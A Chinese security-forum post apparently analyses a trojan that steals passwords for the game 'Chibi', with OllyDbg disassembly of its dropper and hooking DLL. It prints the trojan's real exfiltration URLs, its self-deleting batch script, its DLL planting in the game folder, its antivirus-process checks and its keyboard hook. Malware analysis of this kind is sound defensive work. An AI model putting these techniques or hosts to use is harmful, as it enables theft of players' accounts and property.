对于看雪来说,我是个新手,所以希望能成为正式成员,加入看雪这个大家庭,正好前几天抓到一个木马,拿出来分析一下,希望能获得邀请码。
首先说以下这个木马的大概行为:
1.查找“赤壁”游戏的相关注册表信息来确定游戏安装目录;
2.如果找到游戏安装目录则复制系统文件%systemroot%\system32\comres.dll到“赤壁”游戏安装目录\element下,并重命名为sysGTH.dll,在游戏安装目录\element下释放 CIBIGameRecord.dll和comres.dll,使游戏启动时加载,当游戏启动后并把这两个动态库加载后,相当于实现了对游戏的注入,此时想获取游戏账号密码和虚拟财产则轻而易举;
3.如果没有找到游戏安装目录,则直接跳过第二步;
4.遍历进程avp.Exe和kvmonxp.Exe,如果发现进程则创建批处理360safe.bat,并运行,此批处理的作用就是删除自身;
5.如果没有发现avp.exe和kvmonxp.exe则释放%temp%\elementcb.dll,加载,而此动态库的作用就是设钩子,然后截获帐户密码等信息,然后发送到指定网页
6.最后再释放批处理文件360safe.bat,用来删除自身。
这个木马用UPX加壳,直接用ESP定律,到到OEP
00401530 81EC 280C0000 sub esp, 0C28
00401536 B9 00010000 mov ecx, 100
0040153B 33C0 xor eax, eax
0040153D 53 push ebx
0040153E 55 push ebp
0040153F 56 push esi
00401540 57 push edi
00401541 8DBC24 38080000 lea edi, dword ptr [esp+838]
00401548 F3:AB rep stos dword ptr es:[edi]
0040154A B9 00010000 mov ecx, 100
0040154F 8D7C24 38 lea edi, dword ptr [esp+38]
00401553 F3:AB rep stos dword ptr es:[edi]
00401555 8D4424 38 lea eax, dword ptr [esp+38]
00401559 50 push eax
0040155A 68 0C314000 push 0040310C
0040155F 68 E0304000 push 004030E0 ; ASCII "ChiBiUpdatePack\DefaultIcon"
00401564 68 00000080 push 80000000
00401569 E8 52FFFFFF call 004014C0
(查找游戏注册表)
-------------------------------------------------
004014C0 51 push ecx
004014C1 8B4C24 0C mov ecx, dword ptr [esp+C]
004014C5 8B5424 08 mov edx, dword ptr [esp+8]
004014C9 8D4424 0C lea eax, dword ptr [esp+C]
004014CD C74424 00 00040>mov dword ptr [esp], 400
004014D5 50 push eax
004014D6 68 19000200 push 20019
004014DB 6A 00 push 0
004014DD 51 push ecx
004014DE 52 push edx
004014DF FF15 04204000 call dword ptr [402004] ; ADVAPI32.RegOpenKeyExA
004014E5 85C0 test eax, eax
004014E7 75 3F jnz short 00401528
004014E9 56 push esi
004014EA 8B7424 14 mov esi, dword ptr [esp+14]
004014EE 68 0C314000 push 0040310C
004014F3 56 push esi
004014F4 FF15 84204000 call dword ptr [402084] ; kernel32.lstrcmpiA
004014FA 8B4C24 18 mov ecx, dword ptr [esp+18]
004014FE 85C0 test eax, eax
00401500 8D4424 04 lea eax, dword ptr [esp+4]
00401504 50 push eax
00401505 51 push ecx
00401506 6A 00 push 0
00401508 6A 00 push 0
0040150A 75 04 jnz short 00401510
0040150C 6A 00 push 0
0040150E EB 01 jmp short 00401511
00401510 56 push esi
00401511 8B5424 24 mov edx, dword ptr [esp+24]
00401515 52 push edx
00401516 FF15 00204000 call dword ptr [402000] ; ADVAPI32.RegQueryValueExA
0040151C 8B4424 10 mov eax, dword ptr [esp+10]
00401520 50 push eax
00401521 FF15 08204000 call dword ptr [402008] ; ADVAPI32.RegCloseKey
00401527 5E pop esi
00401528 59 pop ecx
00401529 C3 retn
-------------------------------------------------
0040156E 8B35 58204000 mov esi, dword ptr [402058] ; kernel32.lstrlenA
00401574 83C4 10 add esp, 10
00401577 8D4C24 38 lea ecx, dword ptr [esp+38]
0040157B 51 push ecx
0040157C FFD6 call esi
0040157E 8B1D 38204000 mov ebx, dword ptr [402038] ; kernel32.lstrcatA
00401584 85C0 test eax, eax
00401586 7E 44 jle short 004015CC
(判断有没有找到游戏的注册表,没找到游戏注册表则跳到004015cc,有则继续下一步)
下面这段代码主要是连接字符串,找游戏的相关目录。
00401588 8D5424 38 lea edx, dword ptr [esp+38]
0040158C 52 push edx
0040158D FFD6 call esi
0040158F 8D4C24 38 lea ecx, dword ptr [esp+38]
00401593 8D5424 38 lea edx, dword ptr [esp+38]
00401597 83E9 15 sub ecx, 15
0040159A 52 push edx
0040159B C60408 00 mov byte ptr [eax+ecx], 0
0040159F 8D8424 3C080000 lea eax, dword ptr [esp+83C]
004015A6 50 push eax
004015A7 FF15 34204000 call dword ptr [402034] ; kernel32.lstrcpyA
004015AD 8D8C24 38080000 lea ecx, dword ptr [esp+838]
004015B4 68 D4304000 push 004030D4 ; ASCII "element\"
004015B9 51 push ecx
004015BA FFD3 call ebx
004015BC 8D9424 38080000 lea edx, dword ptr [esp+838]
004015C3 52 push edx
004015C4 E8 D7FBFFFF call 004011A0
(主要是复制%systemroot%\system32\comres.dll到“赤壁”游戏安装目录\element下,并重命名为sysGTH.dll,在游戏安装目录\element下释放CIBIGameRecord.dll和comres.dll)
---------------------------------------------------------------
004011A0 B8 00100000 mov eax, 1000
004011A5 E8 E6050000 call 00401790
004011AA 53 push ebx
004011AB 56 push esi
004011AC 57 push edi
004011AD B9 00010000 mov ecx, 100
004011B2 33C0 xor eax, eax
004011B4 8D7C24 0C lea edi, dword ptr [esp+C]
004011B8 F3:AB rep stos dword ptr es:[edi]
004011BA B9 00010000 mov ecx, 100
004011BF 8DBC24 0C0C0000 lea edi, dword ptr [esp+C0C]
004011C6 F3:AB rep stos dword ptr es:[edi]
004011C8 B9 00010000 mov ecx, 100
004011CD 8DBC24 0C040000 lea edi, dword ptr [esp+40C]
004011D4 F3:AB rep stos dword ptr es:[edi]
004011D6 B9 00010000 mov ecx, 100
004011DB 8DBC24 0C080000 lea edi, dword ptr [esp+80C]
004011E2 F3:AB rep stos dword ptr es:[edi]
004011E4 8D8424 0C040000 lea eax, dword ptr [esp+40C]
004011EB 68 00040000 push 400
004011F0 50 push eax
004011F1 FF15 3C204000 call dword ptr [40203C] ; kernel32.GetSystemDirectoryA
004011F7 8B35 38204000 mov esi, dword ptr [402038] ; kernel32.lstrcatA
004011FD 8D8C24 0C040000 lea ecx, dword ptr [esp+40C]
00401204 68 5C304000 push 0040305C ; ASCII "\comres.dl"
00401209 51 push ecx
0040120A FFD6 call esi
0040120C 8D9424 0C040000 lea edx, dword ptr [esp+40C]
00401213 68 58304000 push 00403058
00401218 52 push edx
00401219 FFD6 call esi
0040121B 8BBC24 10100000 mov edi, dword ptr [esp+1010]
00401222 8B1D 34204000 mov ebx, dword ptr [402034] ; kernel32.lstrcpyA
00401228 8D8424 0C080000 lea eax, dword ptr [esp+80C]
0040122F 57 push edi
00401230 50 push eax
00401231 FFD3 call ebx
00401233 8D8C24 0C080000 lea ecx, dword ptr [esp+80C]
0040123A 68 4C304000 push 0040304C ; ASCII "sysGTH.dll"
0040123F 51 push ecx
00401240 FFD6 call esi
00401242 8D9424 0C080000 lea edx, dword ptr [esp+80C]
00401249 6A 00 push 0
0040124B 8D8424 10040000 lea eax, dword ptr [esp+410]
00401252 52 push edx
00401253 50 push eax
00401254 FF15 30204000 call dword ptr [402030] ; kernel32.CopyFileA
(拷贝C:\WINDOWS\system32\comres.dll"到游侠目录
"element\sysGTH.dll")
0040125A 8D4C24 0C lea ecx, dword ptr [esp+C]
0040125E 57 push edi
0040125F 51 push ecx
00401260 FFD3 call ebx
00401262 8D5424 0C lea edx, dword ptr [esp+C]
00401266 68 38304000 push 00403038 ; ASCII "CIBIGameRecord.dll"
0040126B 52 push edx
0040126C FFD6 call esi
0040126E 8D8424 0C0C0000 lea eax, dword ptr [esp+C0C]
00401275 57 push edi
00401276 50 push eax
00401277 FFD3 call ebx
00401279 8D8C24 0C0C0000 lea ecx, dword ptr [esp+C0C]
00401280 68 2C304000 push 0040302C ; ASCII "comres.dll"
00401285 51 push ecx
00401286 FFD6 call esi
00401288 8D5424 0C lea edx, dword ptr [esp+C]
0040128C 52 push edx
0040128D 6A 6D push 6D
0040128F E8 6CFDFFFF call 00401000
(释放动态库到游戏目录"element\CIBIGameRecord.dll"))
00401294 83C4 08 add esp, 8
00401297 85C0 test eax, eax
00401299 5F pop edi
0040129A 5E pop esi
0040129B 5B pop ebx
0040129C 74 23 je short 004012C1
0040129E 8D8424 000C0000 lea eax, dword ptr [esp+C00]
004012A5 50 push eax
004012A6 6A 6E push 6E
004012A8 E8 53FDFFFF call 00401000
(释放动态库文件到游戏目录 "element\comres.dll")
004012AD 83C4 08 add esp, 8
004012B0 85C0 test eax, eax
004012B2 74 0D je short 004012C1
004012B4 8D4C24 00 lea ecx, dword ptr [esp]
004012B8 51 push ecx
004012B9 E8 12FEFFFF call 004010D0
004012BE 83C4 04 add esp, 4
004012C1 81C4 00100000 add esp, 1000
004012C7 C3 retn
---------------------------------------------------------------
004015C9 83C4 04 add esp, 4
004015CC 68 1C304000 push 0040301C ; avp.exereso
004015D1 E8 FAFCFFFF call 004012D0
(创建进程快照)
004015D6 83C4 04 add esp, 4
004015D9 85C0 test eax, eax
004015DB 0F85 5F010000 jnz 00401740 (
进程比较后如果有卡巴的进程,则跳到00401740,创建批处理文件,删除自身 )
004015E1 68 10304000 push 00403010 ; kvmonxp.exeavp.exereso
004015E6 E8 E5FCFFFF call 004012D0
(创建进程快照,查找是否有江民的进程)
004015EB 83C4 04 add esp, 4
004015EE 85C0 test eax, eax
004015F0 0F85 4A010000 jnz 00401740 (
进程比较后如果有卡巴的进程,则跳到00401740 )
如果没有卡巴和江民的进程则继续下一步, 主要是在临时目录下生成elementcb.dll文件,
004015F6 8B8424 3C0C0000 mov eax, dword ptr [esp+C3C]
004015FD 8B0D C8304000 mov ecx, dword ptr [4030C8]
00401603 8B15 CC304000 mov edx, dword ptr [4030CC]
00401609 A3 00314000 mov dword ptr [403100], eax
0040160E A0 D0304000 mov al, byte ptr [4030D0]
00401613 894C24 10 mov dword ptr [esp+10], ecx
00401617 884424 18 mov byte ptr [esp+18], al
0040161B B9 00010000 mov ecx, 100
00401620 33C0 xor eax, eax
00401622 8DBC24 38040000 lea edi, dword ptr [esp+438]
00401629 F3:AB rep stos dword ptr es:[edi]
0040162B 68 B80B0000 push 0BB8
00401630 895424 18 mov dword ptr [esp+18], edx
00401634 FF15 78204000 call dword ptr [402078] ; kernel32.Sleep
0040163A 8D8C24 38040000 lea ecx, dword ptr [esp+438]
00401641 51 push ecx
00401642 68 04010000 push 104
00401647 FF15 74204000 call dword ptr [402074] ; kernel32.GetTempPathA
0040164D 8D9424 38040000 lea edx, dword ptr [esp+438]
00401654 68 00304000 push 00403000 ; elementcb.dll
00401659 52 push edx
0040165A FFD3 call ebx
0040165C 8D8424 38040000 lea eax, dword ptr [esp+438]
00401663 50 push eax
00401664 6A 6D push 6D
00401666 E8 95F9FFFF call 00401000
0040166B 83C4 08 add esp, 8
0040166E 85C0 test eax, eax
00401670 75 14 jnz short 00401686
00401672 E8 E9FCFFFF call 00401360
00401677 5F pop edi
00401678 5E pop esi
00401679 5D pop ebp
0040167A 33C0 xor eax, eax
0040167C 5B pop ebx
0040167D 81C4 280C0000 add esp, 0C28
00401683 C2 1000 retn 10
如果遇到卡巴或者江民 则创建批出理"360safe.bat"删除自身,退出
00401360 81EC 14090000 sub esp, 914
00401366 56 push esi
00401367 57 push edi
00401368 B9 40000000 mov ecx, 40
0040136D 33C0 xor eax, eax
0040136F 8D7C24 19 lea edi, dword ptr [esp+19]
00401373 C64424 18 00 mov byte ptr [esp+18], 0
00401378 F3:AB rep stos dword ptr es:[edi]
0040137A 66:AB stos word ptr es:[edi]
0040137C AA stos byte ptr es:[edi]
0040137D B9 FF010000 mov ecx, 1FF
00401382 33C0 xor eax, eax
00401384 8DBC24 1D010000 lea edi, dword ptr [esp+11D]
0040138B C68424 1C010000>mov byte ptr [esp+11C], 0
00401393 F3:AB rep stos dword ptr es:[edi]
00401395 66:AB stos word ptr es:[edi]
00401397 8B0D B8304000 mov ecx, dword ptr [4030B8]
0040139D 8B15 BC304000 mov edx, dword ptr [4030BC]
004013A3 AA stos byte ptr es:[edi]
004013A4 A1 B4304000 mov eax, dword ptr [4030B4]
004013A9 68 04010000 push 104
004013AE 894424 0C mov dword ptr [esp+C], eax
004013B2 8D4424 1C lea eax, dword ptr [esp+1C]
004013B6 50 push eax
004013B7 6A 00 push 0
004013B9 894C24 18 mov dword ptr [esp+18], ecx
004013BD 895424 1C mov dword ptr [esp+1C], edx
004013C1 FF15 2C204000 call dword ptr [40202C] ; kernel32.GetModuleFileNameA
004013C7 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
004013CE 68 A8304000 push 004030A8 ; @echo off\n\n360safe.bathkfhkncbqwerty
004013D3 51 push ecx
004013D4 FF15 34204000 call dword ptr [402034] ; kernel32.lstrcpyA
004013DA 8B35 38204000 mov esi, dword ptr [402038] ; kernel32.lstrcatA
004013E0 BF 0A000000 mov edi, 0A
004013E5 8D9424 1C010000 lea edx, dword ptr [esp+11C]
004013EC 68 94304000 push 00403094 ; @echo whm>>a.aqq\n\n
004013F1 52 push edx
004013F2 FFD6 call esi
004013F4 4F dec edi
004013F5 ^ 75 EE jnz short 004013E5
004013F7 8D8424 1C010000 lea eax, dword ptr [esp+11C]
004013FE 68 84304000 push 00403084 ; @del a.aqq\n\n
00401403 50 push eax
00401404 FFD6 call esi
00401406 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
0040140D 68 7C304000 push 0040307C ; @del "
00401412 51 push ecx
00401413 FFD6 call esi
00401415 8D5424 18 lea edx, dword ptr [esp+18]
00401419 8D8424 1C010000 lea eax, dword ptr [esp+11C]
00401420 52 push edx
00401421 50 push eax
00401422 FFD6 call esi
00401424 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
0040142B 68 78304000 push 00403078 ; "\n\n@del "
00401430 51 push ecx
00401431 FFD6 call esi
00401433 8D9424 1C010000 lea edx, dword ptr [esp+11C]
0040143A 68 70304000 push 00403070 ; @del
0040143F 52 push edx
00401440 FFD6 call esi
00401442 8D4424 08 lea eax, dword ptr [esp+8]
00401446 8D8C24 1C010000 lea ecx, dword ptr [esp+11C]
0040144D 50 push eax
0040144E 51 push ecx
0040144F FFD6 call esi
00401451 8D9424 1C010000 lea edx, dword ptr [esp+11C]
00401458 68 68304000 push 00403068 ; \n\n@exit@del
0040145D 52 push edx
0040145E FFD6 call esi
00401460 6A 00 push 0
00401462 6A 00 push 0
00401464 6A 02 push 2
00401466 6A 00 push 0
00401468 6A 00 push 0
0040146A 8D4424 1C lea eax, dword ptr [esp+1C]
0040146E 68 00000040 push 40000000
00401473 50 push eax
00401474 FF15 7C204000 call dword ptr [40207C] ; kernel32.CreateFileA
0040147A 8D4C24 14 lea ecx, dword ptr [esp+14]
0040147E 6A 00 push 0
00401480 51 push ecx
00401481 8D9424 24010000 lea edx, dword ptr [esp+124]
00401488 8BF0 mov esi, eax
0040148A 68 00080000 push 800
0040148F 52 push edx
00401490 56 push esi
00401491 FF15 80204000 call dword ptr [402080] ; kernel32.WriteFile
00401497 56 push esi
00401498 FF15 88204000 call dword ptr [402088] ; kernel32.CloseHandle
0040149E 8D4424 08 lea eax, dword ptr [esp+8]
004014A2 6A 00 push 0
004014A4 50 push eax
004014A5 FF15 54204000 call dword ptr [402054] ; kernel32.WinExec
004014AB 6A 00 push 0
004014AD FF15 50204000 call dword ptr [402050] ; kernel32.ExitProcess
004014B3 5F pop edi
004014B4 5E pop esi
004014B5 81C4 14090000 add esp, 914
004014BB C3 retn
生成的批处理内容
@echo off
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@echo whm>>a.aqq
@del a.aqq
@del "木马所在路径"
@del 360safe.bat
@exit
有什么错误请大侠们指出
--------------------------------------------
补充:
前面我只分析了这个木马的主程序,动态库文件没有分析,现在补上对elementcb.dll的简单分析,因为在调试过程中,有些地方未能完全理解. 这个文件和之前CIBIGameRecord.dll其实是同一个文件,想得到这个文件CIBIGameRecord.dll很简单(在没有安装赤壁游戏的情况下)可以通过OD修改其文件路径,还有另一个comres.dll,也用此方法得到,这个文件很小,其作用也是加载盗号的DLL文件
用OD调试动态库文件有两种方法:
1.可以在.exe文件加载后打开可执行模块(executable modules)即od中的ALT+E 找到加载的动态库,右键跟随入口,然后下断点,按F9运行即可到达动态库文件,如果遇到一直运行却没到达动态库文件领空则重新运行一下OD,然后可以进入动态库领空。
2.另一种方法就是用OD的插件LOADDLL.EXE加载,有时候需要参数的,则需要RUNDLL32.EXE文件加载,这个盗号木马不需要参数,直接用OD加载即可。
由于动态库文件并不像EXE文件那样容易调试,因为动态库文件有时候是某些功能的集合的一个库,各个功能模块直接可能没有必要联系,所以调试的时候按照OD加载的路径调下去可能只看到了一个功能模块,所以在调试动态库时经常无法调试,只能静态的看一下其调用的API来分析其实现的功能.
如果用第一种方法,在地址004016D2处是加载动态库elementcb.dll的,单步到004016D8,加载成功,ALT+E找到
elementcb.dll跟随入口,下断点,F9运行,运行到10003C20
004016D2 FF15 64204000 call dword ptr [402064] ; kernel32.LoadLibraryA
004016D8 8BF0 mov esi, eax
004016DA 85F6 test esi, esi
004016DC 74 7B je short 00401759
004016DE 8B3D 60204000 mov edi, dword ptr [402060] ; kernel32.GetProcAddress
004016E4 68 C4304000 push 004030C4 ; ASCII "hkn"
004016E9 56 push esi
004016EA FFD7 call edi
004016EC 68 C0304000 push 004030C0 ; ASCII "hkf"
004016F1 56 push esi
004016F2 A3 04314000 mov dword ptr [403104], eax
004016F7 FFD7 call edi
004016F9 A3 08314000 mov dword ptr [403108], eax
004016FE FF15 04314000 call dword ptr [403104]
00401704 8B35 90204000 mov esi, dword ptr [402090] ; USER32.GetMessageA
0040170A 6A 00 push 0
0040170C 6A 00 push 0
0040170E 8D4C24 24 lea ecx, dword ptr [esp+24]
到达这里就进入了动态库的领空了,
10003C20 > 8B4424 08 mov eax, dword ptr [esp+8]
10003C24 48 dec eax
10003C25 75 0E jnz short 10003C35
10003C27 8B4424 04 mov eax, dword ptr [esp+4]
10003C2B A3 0C980010 mov dword ptr [1000980C], eax
10003C30 E8 ABFEFFFF call 10003AE0 (这个CALL实现了其主要的功能)
10003C35 B8 01000000 mov eax, 1
10003C3A C2 0C00 retn 0C
-------------------------------------------------------
10003AE0 81EC 20080000 sub esp, 820
10003AE6 8D4424 20 lea eax, dword ptr [esp+20]
10003AEA 56 push esi
10003AEB 68 00080000 push 800
10003AF0 50 push eax
10003AF1 6A 00 push 0
10003AF3 FF15 4C500010 call dword ptr [<&KERNEL32.GetModuleFile>; kernel32.GetModuleFileNameA(获得该模块的文件路径,由于这是通过木马主程序加载的,所以获得的路径为木马的文件路径)
10003AF9 8D4C24 10 lea ecx, dword ptr [esp+10]
10003AFD 8D5424 24 lea edx, dword ptr [esp+24]
10003B01 51 push ecx
10003B02 52 push edx
10003B03 E8 F8F3FFFF call 10002F00(获得文件名字符串)
10003B08 8B35 28500010 mov esi, dword ptr [<&KERNEL32.lstrcmpi>; kernel32.lstrcmpiA
10003B0E 83C4 08 add esp, 8
10003B11 8D4424 10 lea eax, dword ptr [esp+10]
10003B15 68 74660010 push 10006674 ; ASCII "explorer.exe"
10003B1A 50 push eax
10003B1B FFD6 call esi (比较木马文件名和explorer.exe是否相等)
10003B1D 85C0 test eax, eax
10003B1F 0F85 BC000000 jnz 10003BE1 (不过不相等则跳到 10003BE1)
10003B25 E8 86F5FFFF call hkn (安装消息钩子,大部分盗号木马都会有这个功能,可能HOOK的类型不一样而已)
下面这段即是 CALL hkn的内容,通过SetWindowsHookE安装消息钩子,来实现对游戏账号和密码的截获。
------------------------
100030B0 > A1 0C980010 mov eax, dword ptr [1000980C]
100030B5 6A 00 push 0
100030B7 50 push eax
100030B8 68 90300010 push 10003090
100030BD 6A 03 push 3
100030BF FF15 70500010 call dword ptr [<&USER32.SetWindowsHookE>; USER32.SetWindowsHookExA
100030C5 A3 10980010 mov dword ptr [10009810], eax
100030CA B8 01000000 mov eax, 1
100030CF C3 retn
--------------------------
10003B2A 8B0D 68660010 mov ecx, dword ptr [10006668]
10003B30 8B15 6C660010 mov edx, dword ptr [1000666C]
10003B36 A0 70660010 mov al, byte ptr [10006670]
10003B3B 894C24 04 mov dword ptr [esp+4], ecx
10003B3F 895424 08 mov dword ptr [esp+8], edx
10003B43 884424 0C mov byte ptr [esp+C], al
10003B47 E8 34F5FFFF call 10003080
10003B4C 68 5C660010 push 1000665C ; ASCII "cbjasdfgh"
10003B51 6A 00 push 0
10003B53 6A 00 push 0
10003B55 FF15 60500010 call dword ptr [<&KERNEL32.CreateMutexA>>; kernel32.CreateMutexA
(这个就是创建互斥体来防止木马重复运行了)
10003B5B 8BF0 mov esi, eax
10003B5D E8 1EF5FFFF call 10003080
10003B62 FF15 5C500010 call dword ptr [<&KERNEL32.GetLastError>>; ntdll.RtlGetLastWin32Error
10003B68 3D B7000000 cmp eax, 0B7
10003B6D 75 0F jnz short 10003B7E
10003B6F 56 push esi
10003B70 FF15 40500010 call dword ptr [<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
10003B76 5E pop esi
10003B77 81C4 20080000 add esp, 820
10003B7D C3 retn
10003B7E 57 push edi
10003B7F E8 FCF4FFFF call 10003080
10003B84 8D4C24 08 lea ecx, dword ptr [esp+8]
10003B88 51 push ecx
10003B89 6A 00 push 0
10003B8B 68 1F000F00 push 0F001F
10003B90 FF15 58500010 call dword ptr [<&KERNEL32.OpenFileMappi>; kernel32.OpenFileMappingA
10003B96 6A 00 push 0
10003B98 6A 00 push 0
10003B9A 8BF0 mov esi, eax
10003B9C 6A 00 push 0
10003B9E 68 1F000F00 push 0F001F
10003BA3 56 push esi
10003BA4 FF15 54500010 call dword ptr [<&KERNEL32.MapViewOfFile>; kernel32.MapViewOfFile
10003BAA 8BF8 mov edi, eax
10003BAC E8 CFF4FFFF call 10003080
10003BB1 8B17 mov edx, dword ptr [edi]
10003BB3 6A 00 push 0
10003BB5 6A 00 push 0
10003BB7 6A 12 push 12
10003BB9 52 push edx
10003BBA FF15 78500010 call dword ptr [<&USER32.PostThreadMessa>; USER32.PostThreadMessageA (这个发送的消息是WM-QUIT,来关闭自身的)
10003BC0 E8 BBF4FFFF call 10003080
10003BC5 57 push edi
10003BC6 FF15 50500010 call dword ptr [<&KERNEL32.UnmapViewOfFi>; kernel32.UnmapViewOfFile
10003BCC E8 AFF4FFFF call 10003080
10003BD1 56 push esi
10003BD2 FF15 40500010 call dword ptr [<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
10003BD8 5F pop edi
10003BD9 5E pop esi
10003BDA 81C4 20080000 add esp, 820
10003BE0 C3 retn
当判断如果文件名称不是"explorer.exe"则跳到这里,
10003BE1 8D4424 10 lea eax, dword ptr [esp+10]
10003BE5 68 48660010 push 10006648 ; ASCII "elementclient.exe"
10003BEA 50 push eax
10003BEB FFD6 call esi(比较文件名是否为游戏的主程序文件名“elementclient.exe”)
10003BED 85C0 test eax, eax
10003BEF 75 21 jnz short 10003C12 (如果不是则跳到10003c12)
10003BF1 E8 8AF4FFFF call 10003080
10003BF6 8D4C24 24 lea ecx, dword ptr [esp+24]
10003BFA 68 0C880010 push 1000880C
10003BFF 51 push ecx
10003C00 E8 3BF3FFFF call 10002F40
10003C05 83C4 08 add esp, 8
10003C08 E8 43F8FFFF call 10003450 (这个CALL里面主要功能是开始读取自身并且解密,解密出网址和一些网络嗅探监听工具,)
-----------------------------------------------
10003450 81EC E8050000 sub esp, 5E8
10003456 53 push ebx
10003457 56 push esi
10003458 57 push edi
10003459 E8 22FCFFFF call 10003080
1000345E B9 00010000 mov ecx, 100
10003463 33C0 xor eax, eax
10003465 8DBC24 F4010000 lea edi, dword ptr [esp+1F4]
1000346C 68 00080000 push 800
10003471 F3:AB rep stos dword ptr es:[edi]
10003473 8B0D 0C980010 mov ecx, dword ptr [1000980C] ; elementc.10000000
10003479 8D8424 F8010000 lea eax, dword ptr [esp+1F8]
10003480 50 push eax
10003481 51 push ecx
10003482 FF15 4C500010 call dword ptr [<&KERNEL32.GetModuleFile>; kernel32.GetModuleFileNameA
10003488 E8 F3FBFFFF call 10003080
1000348D 68 88130000 push 1388
10003492 FF15 20500010 call dword ptr [<&KERNEL32.Sleep>] ; kernel32.Sleep
10003498 6A 00 push 0
1000349A 6A 00 push 0
1000349C 6A 03 push 3
1000349E 6A 00 push 0
100034A0 6A 01 push 1
100034A2 8D9424 08020000 lea edx, dword ptr [esp+208]
100034A9 68 00000080 push 80000000
100034AE 52 push edx
100034AF FF15 48500010 call dword ptr [<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
100034B5 8BF0 mov esi, eax
100034B7 E8 C4FBFFFF call 10003080
100034BC 8B1D 40500010 mov ebx, dword ptr [<&KERNEL32.CloseHan>; kernel32.CloseHandle
100034C2 83FE FF cmp esi, -1
100034C5 0F84 9E000000 je 10003569
100034CB E8 B0FBFFFF call 10003080
100034D0 6A 02 push 2
100034D2 68 ECFEFFFF push -114
100034D7 56 push esi
100034D8 E8 73E0FFFF call 10001550
100034DD 83C4 0C add esp, 0C
100034E0 E8 9BFBFFFF call 10003080
100034E5 8D8424 B0000000 lea eax, dword ptr [esp+B0]
100034EC 6A 00 push 0
100034EE 50 push eax
100034EF 68 14010000 push 114
100034F4 68 D07D0010 push 10007DD0 ; ASCII "cwwk=,,ttt)o~dgq)hi,+>+4xk,sxk}lidcwwk=,,ttt)o~dgq)hi,+>+4xk,5666"...
100034F9 56 push esi
100034FA FF15 44500010 call dword ptr [<&KERNEL32.ReadFile>] ; kernel32.ReadFile
10003500 E8 7BFBFFFF call 10003080
10003505 68 B87C0010 push 10007CB8 ; ASCII "http://www.lygdv.cn/0907sp/xspzong"
1000350A 68 D07D0010 push 10007DD0 ; ASCII "cwwk=,,ttt)o~dgq)hi,+>+4xk,sxk}lidcwwk=,,ttt)o~dgq)hi,+>+4xk,5666"...
1000350F E8 6CFAFFFF call 10002F80 (解密网址字符串)
10003514 83C4 08 add esp, 8
10003517 E8 64FBFFFF call 10003080
1000351C 8B3D 18500010 mov edi, dword ptr [<&KERNEL32.lstrcpyA>; kernel32.lstrcpyA
10003522 68 127D0010 push 10007D12 ; ASCII "http://www.lygdv.cn/0907sp/2"
10003527 68 E87E0010 push 10007EE8 ; ASCII "http://www.lygdv.cn/0907sp/2/flash.asp"
1000352C FFD7 call edi
1000352E 68 00600010 push 10006000 ; ASCII "/flash.asp"
10003533 68 E87E0010 push 10007EE8 ; ASCII "http://www.lygdv.cn/0907sp/2/flash.asp"
10003538 FF15 0C500010 call dword ptr [<&KERNEL32.lstrcatA>] ; kernel32.lstrcatA
1000353E 68 2C660010 push 1000662C
10003543 68 28820010 push 10008228
10003548 FFD7 call edi
1000354A 68 CC810010 push 100081CC ; ASCII "http://wmdfsawm.3322.org/ww"
1000354F 68 28820010 push 10008228
10003554 E8 77FAFFFF call 10002FD0
..........
10003618 E8 B3FAFFFF call 100030D0 (解密下面嗅探工具字符串)
1000361D E8 5EFAFFFF call 10003080
10003622 B9 07000000 mov ecx, 7
10003627 BE 8C650010 mov esi, 1000658C
1000362C 8DBC24 E4000000 lea edi, dword ptr [esp+E4]
10003633 33C0 xor eax, eax
10003635 F3:A5 rep movs dword ptr es:[edi], dword ptr >
10003637 66:A5 movs word ptr es:[edi], word ptr [esi]
10003639 B9 19000000 mov ecx, 19
1000363E BF 4C840010 mov edi, 1000844C ; ASCII "The Ethereal Network Analyzer"
10003643 F3:AB rep stos dword ptr es:[edi]
10003645 8D8C24 E4000000 lea ecx, dword ptr [esp+E4]
1000364C 68 4C840010 push 1000844C ; ASCII "The Ethereal Network Analyzer"
10003651 51 push ecx
10003652 E8 79FAFFFF call 100030D0
10003657 B9 09000000 mov ecx, 9
1000365C BE 64650010 mov esi, 10006564
10003661 8DBC24 AC010000 lea edi, dword ptr [esp+1AC]
10003668 33C0 xor eax, eax
1000366A F3:A5 rep movs dword ptr es:[edi], dword ptr >
1000366C 66:A5 movs word ptr es:[edi], word ptr [esi]
1000366E A4 movs byte ptr es:[edi], byte ptr [esi]
1000366F B9 19000000 mov ecx, 19
10003674 BF E8830010 mov edi, 100083E8
10003679 8D9424 AC010000 lea edx, dword ptr [esp+1AC]
10003680 68 E8830010 push 100083E8
10003685 F3:AB rep stos dword ptr es:[edi]
10003687 52 push edx
10003688 E8 43FAFFFF call 100030D0
1000368D E8 EEF9FFFF call 10003080
10003692 B9 09000000 mov ecx, 9
10003697 BE 3C650010 mov esi, 1000653C
1000369C 8DBC24 8C010000 lea edi, dword ptr [esp+18C]
100036A3 33C0 xor eax, eax
100036A5 F3:A5 rep movs dword ptr es:[edi], dword ptr >
100036A7 66:A5 movs word ptr es:[edi], word ptr [esi]
100036A9 A4 movs byte ptr es:[edi], byte ptr [esi]
100036AA B9 0C000000 mov ecx, 0C
100036AF BF B4830010 mov edi, 100083B4
100036B4 68 B4830010 push 100083B4
100036B9 F3:AB rep stos dword ptr es:[edi]
100036BB 66:AB stos word ptr es:[edi]
100036BD 8D8424 90010000 lea eax, dword ptr [esp+190]
100036C4 50 push eax
100036C5 E8 06FAFFFF call 100030D0
100036CA E8 B1F9FFFF call 10003080
100036CF B9 09000000 mov ecx, 9
100036D4 BE 14650010 mov esi, 10006514
100036D9 8DBC24 44010000 lea edi, dword ptr [esp+144]
100036E0 33C0 xor eax, eax
100036E2 F3:A5 rep movs dword ptr es:[edi], dword ptr >
100036E4 66:A5 movs word ptr es:[edi], word ptr [esi]
100036E6 A4 movs byte ptr es:[edi], byte ptr [esi]
100036E7 B9 0C000000 mov ecx, 0C
100036EC BF 80830010 mov edi, 10008380
100036F1 F3:AB rep stos dword ptr es:[edi]
100036F3 8D8C24 44010000 lea ecx, dword ptr [esp+144]
